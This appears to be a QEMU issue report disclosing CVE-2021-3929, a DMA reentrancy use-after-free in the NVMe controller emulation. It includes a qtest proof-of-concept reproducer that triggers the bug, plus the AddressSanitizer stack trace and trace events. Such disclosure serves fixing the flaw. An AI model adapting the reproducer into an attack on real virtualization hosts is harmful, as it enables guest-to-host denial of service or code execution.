nvme: DMA reentrancy issue leads to use-after-free (CVE-2021-3929)
Description of problem
A DMA reentrancy issue was found in the NVM Express Controller (NVMe) emulation. Functions dma_buf_write() or dma_buf_read() in hw/nvme/ctrl.c:nvme_tx() can be called without checking if the destination region overlaps with device's MMIO. This is similar to CVE-2021-3750 (#541 (closed)) and, just like it, when the reentrancy write triggers the reset function nvme_ctrl_reset(), data structs will be freed leading to a use-after-free issue. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service condition or, potentially, executing arbitrary code within the context of the QEMU process on the host.
This issue was reported by Qiuhao Li.
Reproducer
cat << EOF | ./qemu-system-x86_64 -display none -machine accel=qtest \
-machine q35 -nodefaults -drive file=null-co://,if=none,format=raw,id=disk0 \
-device nvme,drive=disk0,serial=1 -qtest stdio \
outl 0xcf8 0x80000810 /* MLBAR (BAR0) – Memory Register Base Address, lower 32-bits */
outl 0xcfc 0xe0000000 /* MMIO Base Address = 0xe0000000 */
outl 0xcf8 0x80000804 /* CMD - Command */
outw 0xcfc 0x06 /* Bus Master Enable, Memory Space Enable */
write 0xe0000024 0x4 0x02000200 /* [3] 3.1.8, Admin Queue Attributes */
write 0xe0000028 0x4 0x00100000 /* asq = 0x1000 */
write 0xe0000030 0x4 0x00200000 /* acq = 0x2000 */
write 0xe0000014 0x4 0x01004600 /* [3] 3.1.5, Controller Configuration, start ctrl */
write 0xe0001000 0x1 0x01 /* [3] 3.1.24, SQyTDBL – Submission Queue y Tail Doorbell */
write 0x1000 0x1 0x02 /* cmd->opcode, NVME_ADM_CMD_GET_LOG_PAGE, nvme_get_log() */
write 0x1018 0x4 0x140000e0 /* prp1 = 0xe0000014, NVME_REG_CC, nvme_ctrl_reset() */
write 0x1028 0x4 0x03000004 /* cmd->cdw10, lid = 3 NVME_LOG_FW_SLOT_INFO, nvme_fw_log_info, buf_len = 4 */
write 0x1030 0x4 0xfc010000 /* cmd->cdw12 = 0x1fc, Log Page Offset, trans_len = sizeof(fw_log) - 0x1fc = 4 */
clock_step
EOF
Stack trace
==2682052==ERROR: AddressSanitizer: heap-use-after-free on address 0x616000023d98 at pc 0x56450178ef09 bp 0x7ffc3f0fa330 sp 0x7ffc3f0fa328
WRITE of size 2 at 0x616000023d98 thread T0
#0 0x56450178ef08 in nvme_process_sq ../hw/nvme/ctrl.c:5549:25
#1 0x5645031e960e in timerlist_run_timers ../util/qemu-timer.c:573:9
#2 0x5645031e993c in qemu_clock_run_timers ../util/qemu-timer.c:587:12
#3 0x5645022f3bc4 in qtest_clock_warp ../softmmu/qtest.c:372:9
#4 0x5645022f254d in qtest_process_command ../softmmu/qtest.c:768:9
#5 0x5645022e5ffd in qtest_process_inbuf ../softmmu/qtest.c:813:9
#6 0x5645022f5d3e in qtest_read ../softmmu/qtest.c:825:5
#7 0x564502ed866d in qemu_chr_be_write_impl ../chardev/char.c:201:9
#8 0x564502ed8729 in qemu_chr_be_write ../chardev/char.c:213:9
#9 0x564502ee48a5 in fd_chr_read ../chardev/char-fd.c:73:9
#10 0x56450297b5ec in qio_channel_fd_source_dispatch ../io/channel-watch.c:84:12
#11 0x7f603c5d57c3 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x557c3)
#12 0x5645031c2519 in glib_pollfds_poll ../util/main-loop.c:232:9
#13 0x5645031c1753 in os_host_main_loop_wait ../util/main-loop.c:255:5
#14 0x5645031c131c in main_loop_wait ../util/main-loop.c:531:11
#15 0x56450227faf3 in qemu_main_loop ../softmmu/runstate.c:726:9
#16 0x564500d508de in main ../softmmu/main.c:50:5
#17 0x7f603bdd5fcf in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#18 0x7f603bdd607c in __libc_start_main csu/../csu/libc-start.c:409:3
#19 0x564500c9fa54 in _start (qemu-system-x86_64+0x1a4ba54)
0x616000023d98 is located 24 bytes inside of 624-byte region [0x616000023d80,0x616000023ff0)
freed by thread T0 here:
#0 0x564500d1bfa2 in __interceptor_free (qemu-system-x86_64+0x1ac7fa2)
#1 0x5645017d0a46 in nvme_free_sq ../hw/nvme/ctrl.c:3934:5
#2 0x56450177ec52 in nvme_ctrl_reset ../hw/nvme/ctrl.c:5571:13
#3 0x564501778374 in nvme_write_bar ../hw/nvme/ctrl.c:5817:13
#4 0x564501775d00 in nvme_mmio_write ../hw/nvme/ctrl.c:6167:9
#5 0x56450228b9a3 in memory_region_write_accessor ../softmmu/memory.c:492:5
#6 0x56450228b2e1 in access_with_adjusted_size ../softmmu/memory.c:554:18
#7 0x564502289bf6 in memory_region_dispatch_write ../softmmu/memory.c:1504:16
#8 0x56450225b003 in flatview_write_continue ../softmmu/physmem.c:2779:23
#9 0x564502249b8f in flatview_write ../softmmu/physmem.c:2819:14
#10 0x564502249718 in address_space_write ../softmmu/physmem.c:2911:18
#11 0x564502249eb7 in address_space_rw ../softmmu/physmem.c:2921:16
#12 0x564500f3c33d in dma_memory_rw_relaxed ../include/sysemu/dma.h:88:12
#13 0x564500f3bee0 in dma_memory_rw ../include/sysemu/dma.h:127:12
#14 0x564500f385dd in dma_buf_rw ../softmmu/dma-helpers.c:309:9
#15 0x564500f38187 in dma_buf_read ../softmmu/dma-helpers.c:320:12
#16 0x56450175652f in nvme_tx ../hw/nvme/ctrl.c:1154:24
#17 0x5645017c4084 in nvme_c2h ../hw/nvme/ctrl.c:1189:12
#18 0x5645017d42e4 in nvme_fw_log_info ../hw/nvme/ctrl.c:4140:12
#19 0x5645017c8378 in nvme_get_log ../hw/nvme/ctrl.c:4287:16
#20 0x564501790e65 in nvme_admin_cmd ../hw/nvme/ctrl.c:5492:16
#21 0x56450178ee33 in nvme_process_sq ../hw/nvme/ctrl.c:5547:13
#22 0x5645031e960e in timerlist_run_timers ../util/qemu-timer.c:573:9
#23 0x5645031e993c in qemu_clock_run_timers ../util/qemu-timer.c:587:12
#24 0x5645022f3bc4 in qtest_clock_warp ../softmmu/qtest.c:372:9
#25 0x5645022f254d in qtest_process_command ../softmmu/qtest.c:768:9
#26 0x5645022e5ffd in qtest_process_inbuf ../softmmu/qtest.c:813:9
#27 0x5645022f5d3e in qtest_read ../softmmu/qtest.c:825:5
#28 0x564502ed866d in qemu_chr_be_write_impl ../chardev/char.c:201:9
#29 0x564502ed8729 in qemu_chr_be_write ../chardev/char.c:213:9
previously allocated by thread T0 here:
#0 0x564500d1c3a2 in __interceptor_calloc (qemu-system-x86_64+0x1ac83a2)
#1 0x7f603c5de5b0 in g_malloc0 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x5e5b0)
#2 0x56450177e5e6 in nvme_start_ctrl ../hw/nvme/ctrl.c:5711:5
#3 0x564501778293 in nvme_write_bar ../hw/nvme/ctrl.c:5808:17
#4 0x564501775d00 in nvme_mmio_write ../hw/nvme/ctrl.c:6167:9
#5 0x56450228b9a3 in memory_region_write_accessor ../softmmu/memory.c:492:5
#6 0x56450228b2e1 in access_with_adjusted_size ../softmmu/memory.c:554:18
#7 0x564502289bf6 in memory_region_dispatch_write ../softmmu/memory.c:1504:16
#8 0x56450225b003 in flatview_write_continue ../softmmu/physmem.c:2779:23
#9 0x564502249b8f in flatview_write ../softmmu/physmem.c:2819:14
#10 0x564502249718 in address_space_write ../softmmu/physmem.c:2911:18
#11 0x5645022f06ea in qtest_process_command ../softmmu/qtest.c:670:9
#12 0x5645022e5ffd in qtest_process_inbuf ../softmmu/qtest.c:813:9
#13 0x5645022f5d3e in qtest_read ../softmmu/qtest.c:825:5
#14 0x564502ed866d in qemu_chr_be_write_impl ../chardev/char.c:201:9
#15 0x564502ed8729 in qemu_chr_be_write ../chardev/char.c:213:9
#16 0x564502ee48a5 in fd_chr_read ../chardev/char-fd.c:73:9
#17 0x56450297b5ec in qio_channel_fd_source_dispatch ../io/channel-watch.c:84:12
#18 0x7f603c5d57c3 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x557c3)
SUMMARY: AddressSanitizer: heap-use-after-free ../hw/nvme/ctrl.c:5549:25 in nvme_process_sq
Shadow bytes around the buggy address:
0x0c2c7fffc760: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2c7fffc770: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2c7fffc780: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2c7fffc790: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2c7fffc7a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c2c7fffc7b0: fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2c7fffc7c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2c7fffc7d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2c7fffc7e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2c7fffc7f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
0x0c2c7fffc800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==2682052==ABORTING
Trace events
[I 1635691481.877984] OPENED
cpu_get_apic_base 0x00000000fee00900
cpu_get_apic_base 0x00000000fee00900
cpu_get_apic_base 0x00000000fee00900
[R +0.039936] outl 0xcf8 0x80000810 /* MLBAR (BAR0) – Memory Register Base Address, lower 32-bits */
cpu_out addr 0xcf8(l) value 2147485712
OK
[S +0.039968] OK
[R +0.039983] outl 0xcfc 0xe0000000 /* MMIO Base Address = 0xe0000000 */
cpu_out addr 0xcfc(l) value 3758096384
pci_cfg_write nvme 01:0 @0x10 <- 0xe0000000
OK
[S +0.040008] OK
[R +0.040018] outl 0xcf8 0x80000804 /* CMD - Command */
cpu_out addr 0xcf8(l) value 2147485700
OK
[S +0.040024] OK
[R +0.040031] outw 0xcfc 0x06 /* Bus Master Enable, Memory Space Enable */
cpu_out addr 0xcfc(w) value 6
pci_cfg_write nvme 01:0 @0x4 <- 0x6
pci_update_mappings_add d=0x62900000f200 00:01.0 0,0xe0000000+0x4000
OK
[S +0.041034] OK
[R +0.041059] write 0xe0000024 0x4 0x02000200 /* [2] 3.1.8, Admin Queue Attributes */
pci_nvme_mmio_write addr 0x24 data 0x20002 size 4
pci_nvme_mmio_aqattr wrote MMIO, admin queue attributes=0x20002
OK
[S +0.041078] OK
[R +0.041083] write 0xe0000014 0x4 0x01004600 /* [2] 3.1.5, Controller Configuration */
pci_nvme_mmio_write addr 0x14 data 0x460001 size 4
pci_nvme_mmio_cfg wrote MMIO, config controller config=0x460001
pci_nvme_setfeat_timestamp set feature timestamp = 0x0
pci_nvme_mmio_start_success setting controller enable bit succeeded
OK
[S +0.041116] OK
[R +0.041124] write 0xe0001000 0x1 0x01 /* [2] 3.1.24, SQyTDBL – Submission Queue y Tail Doorbell */
pci_nvme_mmio_write addr 0x1000 data 0x1 size 2
pci_nvme_mmio_doorbell_sq sqid 0 new_tail 1
OK
[S +0.041143] OK
[R +0.041154] write 0x00 0x1 0x02 /* cmd->opcode, NVME_ADM_CMD_GET_LOG_PAGE, nvme_get_log() */
OK
[S +0.041532] OK
[R +0.041557] write 0x18 0x4 0x140000e0 /* prp1 = 0xe0000014, NVME_REG_CC, nvme_ctrl_reset() */
OK
[S +0.041564] OK
[R +0.041571] write 0x28 0x4 0x03000004 /* cmd->cdw10, lid = 3 NVME_LOG_FW_SLOT_INFO, nvme_fw_log_info, buf_len = 4 */
OK
[S +0.041575] OK
[R +0.041582] write 0x30 0x4 0xfc010000 /* cmd->cdw12 = 0x1fc, Log Page Offset, trans_len = sizeof(fw_log) - 0x1fc = 4 */
OK
[S +0.041587] OK
[R +0.041591] clock_step
pci_nvme_admin_cmd cid 0 sqid 0 opc 0x2 opname 'NVME_ADM_CMD_GET_LOG_PAGE'
pci_nvme_get_log cid 0 lid 0x3 lsp 0x0 rae 0x0 len 4100 off 508
pci_nvme_map_prp trans_len 4 len 4 prp1 0xe0000014 prp2 0x0 num_prps 1
pci_nvme_map_addr addr 0xe0000014 len 4
pci_nvme_mmio_write addr 0x14 data 0x0 size 4
pci_nvme_mmio_cfg wrote MMIO, config controller config=0x0
pci_nvme_mmio_stopped cleared controller enable bit